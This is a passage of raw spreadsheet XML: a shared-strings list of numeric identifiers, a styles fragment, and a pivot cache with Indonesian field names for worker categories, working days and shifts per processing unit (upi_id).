  </si>
  <si>
    <t>8120000803403</t>
  </si>
  <si>
    <t>9120003132942</t>
  </si>
  <si>
    <t>933378267216000</t>
  </si>
  <si>
    <t>8120107752273</t>
  </si>
  <si>
    <t>9120500731997</t>
  </si>
  <si>
    <t>8120005960155</t>
  </si>
  <si>
    <t>8120002900537</t>
  </si>
  <si>
    <t>8120200702561</t>
  </si>
  <si>
    <t>0220200200043</t>
  </si>
  <si>
    <t>9120302361682</t>
  </si>
  <si>
    <t>8120212202307</t>
  </si>
  <si>
    <t>0220001542957</t>
  </si>
  <si>
    <t>8120001771996</t>
  </si>
  <si>
    <t>9120003511436</t>
  </si>
  <si>
    <t>8120104922208</t>
  </si>
  <si>
    <t>9120002201528</t>
  </si>
  <si>
    <t>013199575941000</t>
  </si>
  <si>
    <t>0220103581559</t>
  </si>
  <si>
    <t>9120104191749</t>
  </si>
  <si>
    <t>8120000791661</t>
  </si>
  <si>
    <t>8120015251709</t>
  </si>
  <si>
    <t>8120215100063</t>
  </si>
  <si>
    <t>764513149951000</t>
  </si>
  <si>
    <t>0220002830587</t>
  </si>
  <si>
    <t>0220301890463</t>
  </si>
  <si>
    <t>9120210040477</t>
  </si>
  <si>
    <t>955663067951000</t>
  </si>
  <si>
    <t>955219308951000</t>
  </si>
  <si>
    <t>0220109810077</t>
  </si>
  <si>
    <t>9120306890989</t>
  </si>
  <si>
    <t>0220204672632</t>
  </si>
  <si>
    <t>8120002821971</t>
  </si>
  <si>
    <t>9120308771201</t>
  </si>
  <si>
    <t>9120206132793</t>
  </si>
  <si>
    <t>8120117012268</t>
  </si>
  <si>
    <t>0220002790515</t>
  </si>
  <si>
    <t>8120108912202</t>
  </si>
  <si>
    <t>0299011092113</t>
  </si>
  <si>
    <t>9120304272382</t>
  </si>
  <si>
    <t>0220107732517</t>
  </si>
  <si>
    <t>9120017021088</t>
  </si>
  <si>
    <t>0220100791739</t>
  </si>
  <si>
    <t>033349713215000</t>
  </si>
  <si>
    <t>8120003890563</t>
  </si>
  <si>
    <t>9120302490768</t>
  </si>
  <si>
    <t>9120304931505</t>
  </si>
  <si>
    <t>0220203890543</t>
  </si>
  <si>
    <t>0220009512378</t>
  </si>
  <si>
    <t>0220002692044</t>
  </si>
  <si>
    <t>912031121557</t>
  </si>
  <si>
    <t>0220305132507</t>
  </si>
  <si>
    <t>9120011060059</t>
  </si>
  <si>
    <t>0220703970413</t>
  </si>
  <si>
    <t>8120005782554</t>
  </si>
  <si>
    <t>8120210002834</t>
  </si>
  <si>
    <t>8120103950469</t>
  </si>
  <si>
    <t>0220303391821</t>
  </si>
  <si>
    <t>0220003611313</t>
  </si>
  <si>
    <t>8120107991289</t>
  </si>
  <si>
    <t>948053079041000</t>
  </si>
  <si>
    <t>8120211193207</t>
  </si>
  <si>
    <t>9120214142453</t>
  </si>
  <si>
    <t>0220006490876</t>
  </si>
  <si>
    <t>9120001222354</t>
  </si>
  <si>
    <t>0220200691177</t>
  </si>
  <si>
    <t>8120203840613</t>
  </si>
  <si>
    <t>9120006971681</t>
  </si>
  <si>
    <t>942613431022000</t>
  </si>
  <si>
    <t>013435938901001</t>
  </si>
  <si>
    <t>8120117050983</t>
  </si>
  <si>
    <t>8120000910139</t>
  </si>
  <si>
    <t>8120001752609</t>
  </si>
  <si>
    <t>9120107651597</t>
  </si>
  <si>
    <t>0287000952315</t>
  </si>
  <si>
    <t>960011336418000</t>
  </si>
  <si>
    <t>9120001101313</t>
  </si>
  <si>
    <t>8120003840633</t>
  </si>
  <si>
    <t>0220001520556</t>
  </si>
  <si>
    <t>314475807809000</t>
  </si>
  <si>
    <t>9120100191247</t>
  </si>
  <si>
    <t>0220004182014</t>
  </si>
  <si>
    <t>0220005572461</t>
  </si>
  <si>
    <t>0252010020455</t>
  </si>
  <si>
    <t>0220309220153</t>
  </si>
  <si>
    <t>912008702965</t>
  </si>
  <si>
    <t>8120109802991</t>
  </si>
  <si>
    <t>015624174805000</t>
  </si>
  <si>
    <t>0220003652671</t>
  </si>
  <si>
    <t>8120004871089</t>
  </si>
  <si>
    <t>8120007921536</t>
  </si>
  <si>
    <t>9120301152923</t>
  </si>
  <si>
    <t>0220005880136</t>
  </si>
  <si>
    <t>8120003931926</t>
  </si>
  <si>
    <t>8120118050622</t>
  </si>
  <si>
    <t>806060927047000</t>
  </si>
  <si>
    <t>0235001900974</t>
  </si>
  <si>
    <t>9120305962468</t>
  </si>
  <si>
    <t>0220008672693</t>
  </si>
  <si>
    <t>0217000932225</t>
  </si>
  <si>
    <t>8120100910932</t>
  </si>
  <si>
    <t>8120111120124</t>
  </si>
  <si>
    <t>9120317101046</t>
  </si>
  <si>
    <t>9120014040986</t>
  </si>
  <si>
    <t>0220105172074</t>
  </si>
  <si>
    <t>9120319181433</t>
  </si>
  <si>
    <t>0220306241704</t>
  </si>
  <si>
    <t>8120102811563</t>
  </si>
  <si>
    <t>0220101812756</t>
  </si>
  <si>
    <t>0220200720473</t>
  </si>
  <si>
    <t>9120006590079</t>
  </si>
  <si>
    <t>0211013042233</t>
  </si>
  <si>
    <t>0286000932356</t>
  </si>
  <si>
    <t>0224000922999</t>
  </si>
  <si>
    <t>0220009750529</t>
  </si>
  <si>
    <t>0220200131974</t>
  </si>
  <si>
    <t>0231012062734</t>
  </si>
  <si>
    <t>9120201961605</t>
  </si>
  <si>
    <t>0220107510869</t>
  </si>
  <si>
    <t>0230000952288</t>
  </si>
  <si>
    <t>0220103500052</t>
  </si>
  <si>
    <t>9120007591035</t>
  </si>
  <si>
    <t>9120008472899</t>
  </si>
  <si>
    <t>8120112030248</t>
  </si>
  <si>
    <t>9120203131559</t>
  </si>
  <si>
    <t>0220202800044</t>
  </si>
  <si>
    <t>0220001771974</t>
  </si>
  <si>
    <t>8120204860414</t>
  </si>
  <si>
    <t>0280010130945</t>
  </si>
  <si>
    <t>0220203250463</t>
  </si>
  <si>
    <t>0220905970814</t>
  </si>
  <si>
    <t>8120010060983</t>
  </si>
  <si>
    <t>0270010160587</t>
  </si>
  <si>
    <t>8120003772189</t>
  </si>
  <si>
    <t>1236000632483</t>
  </si>
  <si>
    <t>9120110041916</t>
  </si>
  <si>
    <t>722686532629000</t>
  </si>
  <si>
    <t>8120106812741</t>
  </si>
  <si>
    <t>0220203752922</t>
  </si>
  <si>
    <t>9120203760312</t>
  </si>
  <si>
    <t>8120213191569</t>
  </si>
  <si>
    <t>9120302920523</t>
  </si>
  <si>
    <t>0236011092135</t>
  </si>
  <si>
    <t>9120101370449</t>
  </si>
  <si>
    <t>860964139507000</t>
  </si>
  <si>
    <t>0241010210915</t>
  </si>
  <si>
    <t>0209010152149</t>
  </si>
  <si>
    <t>9120307922365</t>
  </si>
  <si>
    <t>8120008920266</t>
  </si>
  <si>
    <t>8120105742562</t>
  </si>
  <si>
    <t>9120107791435</t>
  </si>
  <si>
    <t>9120009932253</t>
  </si>
  <si>
    <t>0216010230844</t>
  </si>
  <si>
    <t>0220002463407</t>
  </si>
  <si>
    <t>0282011101101</t>
  </si>
  <si>
    <t>9120307331546</t>
  </si>
  <si>
    <t>0239010021634</t>
  </si>
  <si>
    <t>0230000922248</t>
  </si>
  <si>
    <t>8120004991331</t>
  </si>
  <si>
    <t>8120008811366</t>
  </si>
  <si>
    <t>9120603761679</t>
  </si>
  <si>
    <t>0233010202142</t>
  </si>
  <si>
    <t>028813921036000</t>
  </si>
  <si>
    <t>0220100262776</t>
  </si>
  <si>
    <t>9120001622808</t>
  </si>
  <si>
    <t>9120103851955</t>
  </si>
  <si>
    <t>9120005682453</t>
  </si>
  <si>
    <t>0220004491155</t>
  </si>
  <si>
    <t>1223000100766</t>
  </si>
  <si>
    <t>9120205143419</t>
  </si>
  <si>
    <t>8120100811706</t>
  </si>
  <si>
    <t>0220100772929</t>
  </si>
  <si>
    <t>9120201192713</t>
  </si>
  <si>
    <t>02200025220333</t>
  </si>
  <si>
    <t>9120007131089</t>
  </si>
  <si>
    <t>8120311082894</t>
  </si>
  <si>
    <t>9120502990334</t>
  </si>
  <si>
    <t>0205010161314</t>
  </si>
  <si>
    <t>912021616129</t>
  </si>
  <si>
    <t>9120319152262</t>
  </si>
  <si>
    <t>0239010151118</t>
  </si>
  <si>
    <t>0220101322366</t>
  </si>
  <si>
    <t>9120006841653</t>
  </si>
  <si>
    <t>8120110152492</t>
  </si>
  <si>
    <t>8120101703303</t>
  </si>
  <si>
    <t>0220004510356</t>
  </si>
  <si>
    <t>9120107153219</t>
  </si>
  <si>
    <t>0220501802287</t>
  </si>
  <si>
    <t>9120007391485</t>
  </si>
  <si>
    <t>1267000122266</t>
  </si>
  <si>
    <t>863803425201000</t>
  </si>
  <si>
    <t>9120109451415</t>
  </si>
  <si>
    <t>954927653951000</t>
  </si>
  <si>
    <t>0247010291554</t>
  </si>
  <si>
    <t>0220200871381</t>
  </si>
  <si>
    <t>015171184401001</t>
  </si>
  <si>
    <t>9120205132619</t>
  </si>
  <si>
    <t>0220205331103</t>
  </si>
  <si>
    <t>096240759951000</t>
  </si>
  <si>
    <t>9120004840975</t>
  </si>
  <si>
    <t>0220205201843</t>
  </si>
  <si>
    <t>1281000122688</t>
  </si>
  <si>
    <t>1206000231019</t>
  </si>
  <si>
    <t>9120119051276</t>
  </si>
  <si>
    <t>9120213251036</t>
  </si>
  <si>
    <t>0220004332606</t>
  </si>
  <si>
    <t>1258000220096</t>
  </si>
  <si>
    <t>8120109753513</t>
  </si>
  <si>
    <t>8120019120282</t>
  </si>
  <si>
    <t>9120005510742</t>
  </si>
  <si>
    <t>0267010062686</t>
  </si>
  <si>
    <t>1251000122764</t>
  </si>
  <si>
    <t>1280000120584</t>
  </si>
  <si>
    <t>728922600642001</t>
  </si>
  <si>
    <t>0220107641955</t>
  </si>
  <si>
    <t>9120014050379</t>
  </si>
  <si>
    <t>0220300321424</t>
  </si>
  <si>
    <t>9120000191213</t>
  </si>
  <si>
    <t>1238000122567</t>
  </si>
  <si>
    <t>8120119022521</t>
  </si>
  <si>
    <t>834227522047000</t>
  </si>
  <si>
    <t>8120018201213</t>
  </si>
  <si>
    <t>8120204863103</t>
  </si>
  <si>
    <t>8120004980314</t>
  </si>
  <si>
    <t>9120215283609</t>
  </si>
  <si>
    <t>9120113251619</t>
  </si>
  <si>
    <t>8120211221546</t>
  </si>
  <si>
    <t>7371110506740001</t>
  </si>
  <si>
    <t>031605603047000</t>
  </si>
  <si>
    <t>1277000350294</t>
  </si>
  <si>
    <t>0243000910376</t>
  </si>
  <si>
    <t>9120105402348</t>
  </si>
  <si>
    <t>1218000391608</t>
  </si>
  <si>
    <t>715851770805000</t>
  </si>
  <si>
    <t>9120303391021</t>
  </si>
  <si>
    <t>9120001432278</t>
  </si>
  <si>
    <t>9120003331469</t>
  </si>
  <si>
    <t>9120113060595</t>
  </si>
  <si>
    <t>0217010010016</t>
  </si>
  <si>
    <t>1282000230588</t>
  </si>
  <si>
    <t>0281010212384</t>
  </si>
  <si>
    <t>1239000202578</t>
  </si>
  <si>
    <t>9120009743205</t>
  </si>
  <si>
    <t>8120116100186</t>
  </si>
  <si>
    <t>0220209341685</t>
  </si>
  <si>
    <t>0298010161534</t>
  </si>
  <si>
    <t>9120102580571</t>
  </si>
  <si>
    <t>9120102390783</t>
  </si>
  <si>
    <t>027287093431000</t>
  </si>
  <si>
    <t>169881059315000</t>
  </si>
  <si>
    <t>671885903304000</t>
  </si>
  <si>
    <t>9120015062161</t>
  </si>
  <si>
    <t>0220007452324</t>
  </si>
  <si>
    <t>9120203972872</t>
  </si>
  <si>
    <t>028100091118</t>
  </si>
  <si>
    <t>0294010092963</t>
  </si>
  <si>
    <t>9120104931536</t>
  </si>
  <si>
    <t>412400228804000</t>
  </si>
  <si>
    <t>9120011153007</t>
  </si>
  <si>
    <t>0220005791339</t>
  </si>
  <si>
    <t>9120013050828</t>
  </si>
  <si>
    <t>9120015012918</t>
  </si>
  <si>
    <t>9120218042583</t>
  </si>
  <si>
    <t>0210010092664</t>
  </si>
  <si>
    <t>9120004642376</t>
  </si>
  <si>
    <t>0220100292544</t>
  </si>
  <si>
    <t>1221000310857</t>
  </si>
  <si>
    <t>0220608842259</t>
  </si>
  <si>
    <t>416624682951000</t>
  </si>
  <si>
    <t>1219000443008</t>
  </si>
  <si>
    <t>160059507951000</t>
  </si>
  <si>
    <t>066928946604000</t>
  </si>
  <si>
    <t>8120108880489</t>
  </si>
  <si>
    <t>9120008742341</t>
  </si>
  <si>
    <t>1269000353614</t>
  </si>
  <si>
    <t>8120109911439</t>
  </si>
  <si>
    <t>1219000560089</t>
  </si>
  <si>
    <t>0266000951943</t>
  </si>
  <si>
    <t>1254000501296</t>
  </si>
  <si>
    <t>1295000502225</t>
  </si>
  <si>
    <t>1265000521673</t>
  </si>
  <si>
    <t>1210000131553</t>
  </si>
  <si>
    <t>423882778912000</t>
  </si>
  <si>
    <t>0220207833511</t>
  </si>
  <si>
    <t>0294010001203</t>
  </si>
  <si>
    <t>9120014101837</t>
  </si>
  <si>
    <t>1282000671544</t>
  </si>
  <si>
    <t>0203010142265</t>
  </si>
  <si>
    <t>1276000611091</t>
  </si>
  <si>
    <t>9120006160496</t>
  </si>
  <si>
    <t>9120307182846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</si>
</sst>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2">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="14" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="20" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="46" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="3"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0" fontId="0" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0"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83.307964004627" createdVersion="7" refreshedVersion="7" minRefreshableVersion="3" recordCount="23248" xr:uid="{95924BF6-1505-ED48-A53B-889A6BF8880D}">
  <cacheSource type="worksheet">
    <worksheetSource ref="A1:D23249" sheet="Sheet4"/>
  </cacheSource>
  <cacheFields count="4">
    <cacheField name="upi_produksi_group_id" numFmtId="0">
      <sharedItems count="6">
        <s v="tk_tetap_l"/>
        <s v="tk_tetap_p"/>
        <s v="tk_harian_l"/>
        <s v="tk_harian_p"/>
        <s v="jumlah_hari_kerja"/>
        <s v="jumlah_shift"/>
      </sharedItems>
    </cacheField>
    <cacheField name="value" numFmtId="0">
      <sharedItems count="14">
        <s v="tka_administrasi_l"/>
        <s v="tka_administrasi_p"/>
        <s v="tka_pengolahan_l"/>
        <s v="tka_pengolahan_p"/>
        <s v="tkt_administrasi_l"/>
        <s v="tkt_administrasi_p"/>
        <s v="tkt_pengolahan_l"/>
        <s v="tkt_pengolahan_p"/>
        <s v="tkh_administrasi_l"/>
        <s v="tkh_administrasi_p"/>
        <s v="tkh_pengolahan_l"/>
        <s v="tkh_pengolahan_p"/>
        <s v="jumlah_hari_kerja"/>
        <s v="jumlah_shift"/>
      </sharedItems>
    </cacheField>
    <cacheField name="unit" numFmtId="0">
      <sharedItems containsSemiMixedTypes="0" containsString="0" containsNumber="1" containsInteger="1" minValue="0" maxValue="2760"/>
    </cacheField>
    <cacheField name="upi_id" numFmtId="0">
      <sharedItems containsSemiMixedTypes="0" containsString="0" containsNumber="1" containsInteger="1" minValue="7" maxValue="6154" count="1597">
        <n v="2341"/>
        <n v="683"/>
        <n v="2277"/>
        <n v="1324"/>
        <n v="1499"/>
        <n v="1310"/>
        <n v="642"/>
        <n v="88"/>
        <n v="2355"/>
        <n v="1237"/>
        <n v="2143"/>
        <n v="686"/>
        <n v="2157"/>
        <n v="290"/>
        <n v="776"/>
        <n v="159"/>
        <n v="2287"/>
        <n v="306"/>
        <n v="452"/>
        <n v="2109"/>
        <n v="2021"/>
        <n v="1097"/>
        <n v="2325"/>
        <n v="1381"/>
        <n v="1687"/>
        <n v="181"/>
        <n v="343"/>
        <n v="510"/>
        <n v="2522"/>
        <n v="943"/>
        <n v="1149"/>
        <n v="2126"/>
        <n v="572"/>
        <n v="1238"/>
        <n v="423"/>
        <n v="1503"/>
        <n v="1257"/>
        <n v="2068"/>
        <n v="2359"/>
        <n v="2318"/>
        <n v="853"/>
        <n v="1358"/>
        <n v="433"/>
        <n v="775"/>
        <n v="396"/>
        <n v="958"/>
        <n v="2345"/>
        <n v="2278"/>
        <n v="1971"/>
        <n v="1240"/>
        <n v="454"/>
        <n v="360"/>
        <n v="2362"/>
        <n v="2344"/>
        <n v="766"/>
        <n v="465"/>
        <n v="1183"/>
        <n v="1691"/>
        <n v="2246"/>
        <n v="2259"/>
        <n v="325"/>
        <n v="2206"/>
        <n v="1989"/>
        <n v="2056"/>
        <n v="2255"/>
        <n v="1715"/>
        <n v="2353"/>
        <n v="2538"/>
        <n v="2526"/>
        <n v="2361"/>
        <n v="2525"/>
        <n v="400"/>
        <n v="627"/>
        <n v="324"/>
        <n v="1033"/>
        <n v="428"/>
        <n v="1988"/>
        <n v="2295"/>
        <n v="2533"/>
        <n v="2066"/>
        <n v="133"/>
        <n v="908"/>
        <n v="455"/>
        <n v="2531"/>
        <n v="361"/>
        <n v="2244"/>
        <n v="67"/>
        <n v="2524"/>
        <n v="1823"/>
        <n v="2553"/>
        <n v="114"/>
        <n v="590"/>
        <n v="2558"/>
        <n v="2142"/>
        <n v="2559"/>
        <n v="2196"/>
        <n v="2537"/>
        <n v="2555"/>
        <n v="949"/>
        <n v="2554"/>
        <n v="610"/>
        <n v="2236"/>
        <n v="175"/>
        <n v="1367"/>
        <n v="2242"/>
        <n v="1304"/>
        <n v="2178"/>
        <n v="722"/>
        <n v="2560"/>
        <n v="2591"/>
        <n v="927"/>
        <n v="592"/>
        <n v="613"/>
        <n v="364"/>
        <n v="2297"/>
        <n v="2550"/>
        <n v="1568"/>
        <n v="388"/>
        <n v="2347"/>
        <n v="300"/>
        <n v="2528"/>
        <n v="1178"/>
        <n v="1141"/>
        <n v="2545"/>
        <n v="1452"/>
        <n v="1344"/>
        <n v="2569"/>
        <n v="2573"/>
        <n v="2155"/>
        <n v="358"/>
        <n v="2561"/>
        <n v="2579"/>
        <n v="1514"/>
        <n v="2578"/>
        <n v="1061"/>
        <n v="389"/>
        <n v="2337"/>
        <n v="2064"/>
        <n v="2562"/>
        <n v="1598"/>
        <n v="233"/>
        <n v="2600"/>
        <n v="2118"/>
        <n v="1130"/>
        <n v="2293"/>
        <n v="1536"/>
        <n v="2309"/>
        <n v="2340"/>
        <n v="2282"/>
        <n v="2058"/>
        <n v="760"/>
        <n v="2590"/>
        <n v="2331"/>
        <n v="655"/>
        <n v="1190"/>
        <n v="408"/>
        <n v="806"/>
        <n v="825"/>
        <n v="1405"/>
        <n v="1846"/>
        <n v="2577"/>
        <n v="2290"/>
        <n v="2574"/>
        <n v="2602"/>
        <n v="1701"/>
        <n v="796"/>
        <n v="2586"/>
        <n v="2568"/>
        <n v="2541"/>
        <n v="582"/>
        <n v="2564"/>
        <n v="737"/>
        <n v="2557"/>
        <n v="2608"/>
        <n v="1650"/>
        <n v="516"/>
        <n v="235"/>
        <n v="634"/>
        <n v="1729"/>
        <n v="2583"/>
        <n v="2572"/>
        <n v="2323"/>
        <n v="2594"/>
        <n v="1858"/>
        <n v="2546"/>
        <n v="557"/>
        <n v="2598"/>
        <n v="226"/>
        <n v="2183"/>
        <n v="2571"/>
        <n v="2521"/>
        <n v="215"/>
        <n v="1337"/>
        <n v="985"/>
        <n v="1028"/>
        <n v="2358"/>
        <n v="2016"/>
        <n v="2390"/>
        <n v="359"/>
        <n v="2304"/>
        <n v="1326"/>
        <n v="501"/>
        <n v="2617"/>
        <n v="2618"/>
        <n v="2620"/>
        <n v="2024"/>
        <n v="2247"/>
        <n v="2563"/>
        <n v="1813"/>
        <n v="1408"/>
        <n v="2633"/>
        <n v="373"/>
        <n v="984"/>
        <n v="661"/>
        <n v="2629"/>
        <n v="2254"/>
        <n v="559"/>
        <n v="2641"/>
        <n v="2589"/>
        <n v="462"/>
        <n v="2051"/>
        <n v="442"/>
        <n v="492"/>
        <n v="2252"/>
        <n v="2134"/>
        <n v="2249"/>
        <n v="2637"/>
        <n v="1639"/>
        <n v="2621"/>
        <n v="2611"/>
        <n v="206"/>
        <n v="2191"/>
        <n v="2604"/>
        <n v="674"/>
        <n v="27"/>
        <n v="2138"/>
        <n v="561"/>
        <n v="1490"/>
        <n v="1270"/>
        <n v="650"/>
        <n v="633"/>
        <n v="500"/>
        <n v="2284"/>
        <n v="337"/>
        <n v="2607"/>
        <n v="2660"/>
        <n v="305"/>
        <n v="2601"/>
        <n v="2310"/>
        <n v="2615"/>
        <n v="2576"/>
        <n v="346"/>
        <n v="2317"/>
        <n v="46"/>
        <n v="560"/>
        <n v="2308"/>
        <n v="1262"/>
        <n v="990"/>
        <n v="704"/>
        <n v="2669"/>
        <n v="2661"/>
        <n v="1611"/>
        <n v="656"/>
        <n v="2674"/>
        <n v="2636"/>
        <n v="680"/>
        <n v="2619"/>
        <n v="2639"/>
        <n v="1957"/>
        <n v="2671"/>
        <n v="170"/>
        <n v="2610"/>
        <n v="1430"/>
        <n v="280"/>
        <n v="1713"/>
        <n v="2653"/>
        <n v="2098"/>
        <n v="2054"/>
        <n v="759"/>
        <n v="782"/>
        <n v="2649"/>
        <n v="935"/>
        <n v="2605"/>
        <n v="830"/>
        <n v="2110"/>
        <n v="367"/>
        <n v="2676"/>
        <n v="640"/>
        <n v="533"/>
        <n v="371"/>
        <n v="2705"/>
        <n v="2659"/>
        <n v="709"/>
        <n v="2657"/>
        <n v="2701"/>
        <n v="302"/>
        <n v="237"/>
        <n v="163"/>
        <n v="1758"/>
        <n v="2088"/>
        <n v="522"/>
        <n v="2677"/>
        <n v="1749"/>
        <n v="2547"/>
        <n v="2656"/>
        <n v="217"/>
        <n v="538"/>
        <n v="2667"/>
        <n v="873"/>
        <n v="2609"/>
        <n v="2543"/>
        <n v="596"/>
        <n v="1275"/>
        <n v="385"/>
        <n v="2706"/>
        <n v="1349"/>
        <n v="2241"/>
        <n v="571"/>
        <n v="2710"/>
        <n v="2711"/>
        <n v="609"/>
        <n v="2687"/>
        <n v="2585"/>
        <n v="1407"/>
        <n v="482"/>
        <n v="2719"/>
        <n v="922"/>
        <n v="2647"/>
        <n v="2581"/>
        <n v="578"/>
        <n v="2082"/>
        <n v="689"/>
        <n v="212"/>
        <n v="2700"/>
        <n v="379"/>
        <n v="2613"/>
        <n v="274"/>
        <n v="420"/>
        <n v="743"/>
        <n v="2632"/>
        <n v="2737"/>
        <n v="333"/>
        <n v="1973"/>
        <n v="1992"/>
        <n v="2734"/>
        <n v="899"/>
        <n v="2205"/>
        <n v="829"/>
        <n v="2690"/>
        <n v="509"/>
        <n v="390"/>
        <n v="1248"/>
        <n v="2724"/>
        <n v="318"/>
        <n v="2314"/>
        <n v="756"/>
        <n v="512"/>
        <n v="593"/>
        <n v="2107"/>
        <n v="532"/>
        <n v="2735"/>
        <n v="2753"/>
        <n v="160"/>
        <n v="758"/>
        <n v="244"/>
        <n v="515"/>
        <n v="2276"/>
        <n v="1891"/>
        <n v="228"/>
        <n v="583"/>
        <n v="2616"/>
        <n v="771"/>
        <n v="2750"/>
        <n v="625"/>
        <n v="374"/>
        <n v="2759"/>
        <n v="463"/>
        <n v="2275"/>
        <n v="2760"/>
        <n v="2250"/>
        <n v="2689"/>
        <n v="1160"/>
        <n v="2658"/>
        <n v="2685"/>
        <n v="1574"/>
        <n v="2253"/>
        <n v="1424"/>
        <n v="1714"/>
        <n v="915"/>
        <n v="2747"/>
        <n v="1764"/>
        <n v="2774"/>
        <n v="882"/>
        <n v="2777"/>
        <n v="2772"/>
        <n v="2346"/>
        <n v="2235"/>
        <n v="2695"/>
        <n v="2692"/>
        <n v="2070"/>
        <n v="2718"/>
        <n v="2715"/>
        <n v="888"/>
        <n v="56"/>
        <n v="2655"/>
        <n v="2762"/>
        <n v="2761"/>
        <n v="2769"/>
        <n v="992"/>
        <n v="1000"/>
        <n v="800"/>
        <n v="458"/>
        <n v="608"/>
        <n v="2784"/>
        <n v="768"/>
        <n v="520"/>
        <n v="2781"/>
        <n v="2102"/>
        <n v="242"/>
        <n v="2031"/>
        <n v="2332"/>
        <n v="603"/>
        <n v="1308"/>
        <n v="459"/>
        <n v="395"/>
        <n v="2234"/>
        <n v="1852"/>
        <n v="1912"/>
        <n v="541"/>
        <n v="2756"/>
        <n v="840"/>
        <n v="489"/>
        <n v="518"/>
        <n v="2675"/>
        <n v="2732"/>
        <n v="502"/>
        <n v="779"/>
        <n v="2776"/>
        <n v="2792"/>
        <n v="794"/>
        <n v="1582"/>
        <n v="881"/>
        <n v="862"/>
        <n v="256"/>
        <n v="2802"/>
        <n v="2596"/>
        <n v="2798"/>
        <n v="2698"/>
        <n v="586"/>
        <n v="272"/>
        <n v="671"/>
        <n v="2811"/>
        <n v="286"/>
        <n v="2077"/>
        <n v="186"/>
        <n v="690"/>
        <n v="841"/>
        <n v="473"/>
        <n v="2622"/>
        <n v="2429"/>
        <n v="2272"/>
        <n v="2368"/>
        <n v="716"/>
        <n v="1131"/>
        <n v="734"/>
        <n v="2703"/>
        <n v="259"/>
        <n v="1087"/>
        <n v="645"/>
        <n v="2097"/>
        <n v="229"/>
        <n v="735"/>
        <n v="1353"/>
        <n v="667"/>
        <n v="137"/>
        <n v="1026"/>
        <n v="769"/>
        <n v="2785"/>
        <n v="2755"/>
        <n v="350"/>
        <n v="227"/>
        <n v="2335"/>
        <n v="514"/>
        <n v="248"/>
        <n v="507"/>
        <n v="684"/>
        <n v="2838"/>
        <n v="803"/>
        <n v="47"/>
        <n v="662"/>
        <n v="929"/>
        <n v="746"/>
        <n v="764"/>
        <n v="2817"/>
        <n v="2686"/>
        <n v="750"/>
        <n v="2844"/>
        <n v="2367"/>
        <n v="383"/>
        <n v="2186"/>
        <n v="528"/>
        <n v="469"/>
        <n v="1725"/>
        <n v="621"/>
        <n v="2810"/>
        <n v="479"/>
        <n v="131"/>
        <n v="368"/>
        <n v="2822"/>
        <n v="439"/>
        <n v="624"/>
        <n v="1647"/>
        <n v="738"/>
        <n v="2837"/>
        <n v="297"/>
        <n v="664"/>
        <n v="4759"/>
        <n v="384"/>
        <n v="210"/>
        <n v="604"/>
        <n v="711"/>
        <n v="2075"/>
        <n v="475"/>
        <n v="352"/>
        <n v="1070"/>
        <n v="1318"/>
        <n v="2862"/>
        <n v="1143"/>
        <n v="474"/>
        <n v="925"/>
        <n v="946"/>
        <n v="1413"/>
        <n v="4571"/>
        <n v="895"/>
        <n v="80"/>
        <n v="2731"/>
        <n v="1117"/>
        <n v="1811"/>
        <n v="826"/>
        <n v="963"/>
        <n v="2856"/>
        <n v="1946"/>
        <n v="1156"/>
        <n v="909"/>
        <n v="2820"/>
        <n v="2835"/>
        <n v="2839"/>
        <n v="197"/>
        <n v="1120"/>
        <n v="681"/>
        <n v="4776"/>
        <n v="4773"/>
        <n v="1155"/>
        <n v="2245"/>
        <n v="4771"/>
        <n v="708"/>
        <n v="4775"/>
        <n v="1435"/>
        <n v="4777"/>
        <n v="2532"/>
        <n v="142"/>
        <n v="4787"/>
        <n v="879"/>
        <n v="639"/>
        <n v="444"/>
        <n v="2736"/>
        <n v="4782"/>
        <n v="241"/>
        <n v="4788"/>
        <n v="1638"/>
        <n v="2818"/>
        <n v="4798"/>
        <n v="49"/>
        <n v="1785"/>
        <n v="2625"/>
        <n v="1125"/>
        <n v="427"/>
        <n v="119"/>
        <n v="4779"/>
        <n v="622"/>
        <n v="594"/>
        <n v="2827"/>
        <n v="4764"/>
        <n v="1222"/>
        <n v="993"/>
        <n v="332"/>
        <n v="1067"/>
        <n v="2794"/>
        <n v="848"/>
        <n v="2693"/>
        <n v="2189"/>
        <n v="4814"/>
        <n v="953"/>
        <n v="564"/>
        <n v="1678"/>
        <n v="4824"/>
        <n v="569"/>
        <n v="4803"/>
        <n v="777"/>
        <n v="1144"/>
        <n v="932"/>
        <n v="1052"/>
        <n v="824"/>
        <n v="732"/>
        <n v="4839"/>
        <n v="4838"/>
        <n v="4789"/>
        <n v="2738"/>
        <n v="606"/>
        <n v="2778"/>
        <n v="1051"/>
        <n v="4837"/>
        <n v="4422"/>
        <n v="4813"/>
        <n v="892"/>
        <n v="295"/>
        <n v="2779"/>
        <n v="4836"/>
        <n v="679"/>
        <n v="4847"/>
        <n v="292"/>
        <n v="618"/>
        <n v="4821"/>
        <n v="1951"/>
        <n v="548"/>
        <n v="1384"/>
        <n v="4761"/>
        <n v="1507"/>
        <n v="710"/>
        <n v="2529"/>
        <n v="2826"/>
        <n v="4811"/>
        <n v="4810"/>
        <n v="2688"/>
        <n v="565"/>
        <n v="276"/>
        <n v="1558"/>
        <n v="1287"/>
        <n v="2742"/>
        <n v="4809"/>
        <n v="4817"/>
        <n v="919"/>
        <n v="575"/>
        <n v="1818"/>
        <n v="2814"/>
        <n v="550"/>
        <n v="2036"/>
        <n v="460"/>
        <n v="2702"/>
        <n v="4834"/>
        <n v="4799"/>
        <n v="4841"/>
        <n v="999"/>
        <n v="701"/>
        <n v="1400"/>
        <n v="1500"/>
        <n v="577"/>
        <n v="4774"/>
        <n v="938"/>
        <n v="1057"/>
        <n v="4853"/>
        <n v="940"/>
        <n v="930"/>
        <n v="721"/>
        <n v="998"/>
        <n v="4840"/>
        <n v="631"/>
        <n v="2296"/>
        <n v="2046"/>
        <n v="2740"/>
        <n v="2243"/>
        <n v="57"/>
        <n v="20"/>
        <n v="4863"/>
        <n v="1565"/>
        <n v="4801"/>
        <n v="4790"/>
        <n v="4830"/>
        <n v="1126"/>
        <n v="1970"/>
        <n v="4889"/>
        <n v="4876"/>
        <n v="4862"/>
        <n v="4846"/>
